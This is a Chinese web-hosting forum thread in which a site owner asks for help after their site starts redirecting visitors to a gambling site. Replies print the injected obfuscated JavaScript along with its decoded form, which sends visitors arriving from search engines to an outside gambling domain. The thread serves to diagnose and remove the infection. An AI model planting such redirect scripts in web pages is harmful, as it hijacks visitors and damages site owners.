立即注册  找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 95|回复: 8

网站被挂马,插跳转。哪位大神能帮我看看?

[复制链接]

网站被挂马,插跳转。哪位大神能帮我看看?

[复制链接]

2

主题

32

回帖

114

积分

注册会员

积分
114
wife8114

2

主题

32

回帖

114

积分

注册会员

积分
114
2018-8-10 18:20:07 | 显示全部楼层 |阅读模式
http://www.sirasun.com/
点击两个产品,页面就跳转到一个赌  bo网站了。
大佬们能指定一二吗?
回复

使用道具 举报

22

主题

274

回帖

954

积分

高级会员

积分
954
LOC论坛最屌MJJ

22

主题

274

回帖

954

积分

高级会员

积分
954
2018-8-10 18:40:50 | 显示全部楼层
本帖最后由 LOC论坛最屌MJJ 于 2018-8-10 18:44 编辑

这种是 肯定是要付红包才能搞定的啦




这个看起来怪怪的,另外asp之前的代码看不到 有可能产品页的asp里面还有跳转
回复

使用道具 举报

133

主题

1108

回帖

3912

积分

论坛元老

积分
3912
bob1987

133

主题

1108

回帖

3912

积分

论坛元老

积分
3912
2018-8-10 18:42:24 | 显示全部楼层

删掉就行啦。貌似是这个,不过即使删了还是被挂马,你的网址程序是asp的,肯定漏洞一大把,找个php程序重新做吧
回复

使用道具 举报

42

主题

156

回帖

676

积分

高级会员

积分
676
fifalan

42

主题

156

回帖

676

积分

高级会员

积分
676
2018-8-10 21:14:52 | 显示全部楼层


简单加密的。f(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 ) 这段是判断搜索引擎爬虫的?
回复

使用道具 举报

43

主题

1026

回帖

3740

积分

论坛元老

积分
3740
jshkk

43

主题

1026

回帖

3740

积分

论坛元老

积分
3740
2018-8-10 21:42:09 | 显示全部楼层
[ol]
  • eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.4("");3.4("e 1=3.g");3.4("f(1.2(\"b\")>0 || 1.2(\"7\")>0 || 1.2(\"6\")>0 ||1.2(\"8\")>0 ||1.2(\"a\")>0 ||1.2(\"9\")>0 ||1.2(\"n\")>0 ||1.2(\"q\")>0 )");3.4("m.i=\"h://j.l.k/p.o\";");3.4("");',27,27,'|s|indexOf|document|writeln|script|soso|sogou|sm|bing|uc|baidu|Javascript|LANGUAGE|var|if|referrer|http|href|you|vip|wangtou888|location|yahoo|html|index|so'.split('|'),0,{}))[/ol]复制代码

    解码后::
    [ol]
  • document.writeln("");[/ol]复制代码
    然后就跳转到了http://you。wangtou888。vip/index.html
  • 回复

    使用道具 举报

    31

    主题

    323

    回帖

    1085

    积分

    金牌会员

    积分
    1085
    Vhc

    31

    主题

    323

    回帖

    1085

    积分

    金牌会员

    积分
    1085
    2018-8-10 21:51:27 | 显示全部楼层
    [ol]
  • var s = document.referrer;
  • if (s.indexOf("baidu") > 0 || s.indexOf("sogou") > 0 || s.indexOf("soso") > 0 || s.indexOf("sm") > 0 || s.indexOf("uc") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("so") > 0) {
  •     location.href = "http://you.wangtou888.vip/index.html";
  • }
  • [/ol]复制代码
  • 回复

    使用道具 举报

    729

    主题

    971

    回帖

    6885

    积分

    论坛元老

    积分
    6885
    怪人

    729

    主题

    971

    回帖

    6885

    积分

    论坛元老

    积分
    6885
    2018-8-10 21:59:07 | 显示全部楼层
    大佬牛x
    回复

    使用道具 举报

    2

    主题

    32

    回帖

    114

    积分

    注册会员

    积分
    114
    wife8114 楼主

    2

    主题

    32

    回帖

    114

    积分

    注册会员

    积分
    114
    2018-8-10 22:24:12 | 显示全部楼层

    bob1987 发表于 2018-8-10 18:42

    eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!' ...

    有什么靠谱的php程序,求推荐。
    就是这段js,感谢。
    回复

    使用道具 举报

    2

    主题

    32

    回帖

    114

    积分

    注册会员

    积分
    114
    wife8114 楼主

    2

    主题

    32

    回帖

    114

    积分

    注册会员

    积分
    114
    2018-8-10 18:42:00 | 显示全部楼层

    jshkk 发表于 2018-8-10 21:42

    解码后::

    然后就跳转到了http://you。wangtou888。vip/index.html

    感谢,直接命中要害!
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|小黑屋|HS2V主机综合交流论坛

    GMT+8, 2024-12-23 16:24 , Processed in 0.023816 second(s), 4 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表